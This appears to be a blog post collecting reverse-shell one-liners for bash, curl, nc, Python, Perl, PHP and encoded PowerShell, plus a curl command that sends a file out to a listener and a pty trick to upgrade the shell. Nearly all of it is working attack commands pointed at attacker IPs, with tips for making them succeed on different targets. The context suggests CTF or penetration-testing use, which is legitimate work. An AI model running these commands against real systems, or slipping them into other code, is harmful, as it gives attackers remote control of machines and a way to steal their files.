Reverse shells

A small collection of reverse shell commands that may come in handy. In all of them the target connects back to the attacker, so a listener (for example nc) must already be waiting on the ip:port you substitute in.

bash

bash -i >& /dev/tcp/ip/port 0>&1

/dev/tcp/... is a bash feature rather than a real file, so this line has to be executed by bash itself; sh or dash will fail with "No such file or directory".

curl

Put the bash one-liner in a file (shell.txt) served from the attacker's web server, then fetch it on the target and pipe it into bash (which is also what makes the /dev/tcp redirection work):

bash -i >& /dev/tcp/192.168.20.151/7777 0>&1
curl http://174.1.73.154/shell.txt|bash

PS: for out-of-band (OOB) exfiltration, when you have command execution but no shell, curl can POST a file to a listener:

curl 174.2.171.201:6666 -d @/flag

@ tells curl to read the POST body from the named file. Note that -d strips carriage returns and newlines from that data; use --data-binary @/flag to send the file byte for byte.

nc

nc -e /bin/sh ip port

-e exists only in netcat builds compiled with it (nc.traditional, ncat, busybox nc); the OpenBSD netcat shipped by many distributions has no -e at all, so check which nc the target has before relying on this.

python

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

The three os.dup2 calls point stdin, stdout and stderr at the socket before bash is started, so no pipes or shell redirection are needed. The same line runs unchanged under python3.

perl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

With concrete values:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.224.117:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

The parent exits right after fork, so the shell keeps running as a detached child even if the process that launched it goes away. Each line received is run through system, so it is a command loop rather than an interactive bash.

php

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

This assumes the socket is file descriptor 3, i.e. the first descriptor a fresh process opens after 0, 1 and 2. If the PHP process already has other files or sockets open, the number is different and the redirections have to be adjusted.

PowerShell

Build the Base64 for -enc on the attacker side. The encoded script is a TCPClient reverse shell that reads a line from the socket, runs it with iex, and writes the output back with a fake PS prompt; the listener here is 174.1.52.162:6666:

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('$c=New-Object Net.Sockets.TCPClient("174.1.52.162",6666);$s=$c.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$s.Read($bytes, 0, $bytes.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb+''PS ''+(pwd).Path+''> '';$sb=([Text.Encoding]::Default).GetBytes($sb2);$s.Write($sb,0,$s.Length);$s.Flush()};$c.Close()'))

Then run it on the target, passing the Base64 string produced above:

powershell -nop -enc {base64 output of the command above}

-enc (-EncodedCommand) expects the script as UTF-16LE, which is why the bytes are taken with [Text.Encoding]::Unicode rather than ASCII or UTF-8; a Base64 string made from UTF-8 bytes will not run. The doubled single quotes (''PS '') are how a literal ' is written inside a single-quoted PowerShell string.

Getting a more usable shell

The shell you get back this way has no TTY: no job control or tab completion, Ctrl-C kills the connection instead of the running program, and programs that need a terminal (su, the sudo password prompt, ssh) refuse to run. The procedure for fixing this is in ropnop's "Upgrading Simple Shells to Fully Interactive TTYs".

pty

python -c 'import pty; pty.spawn("/bin/bash")'

This starts bash inside a pseudo-terminal, which already gives you prompts and interactive programs. The rest of the procedure from that article (background the shell, put the local terminal into raw mode with echo off, foreground it again, then set TERM and the terminal size on the remote side) makes it behave like a normal terminal session.

References

Methods for spawning reverse shells in various environments (各种环境下反弹shell的方法)
Reverse Shell Cheat Sheet

Posted 2020-03-02 20:53 by MustaphaMond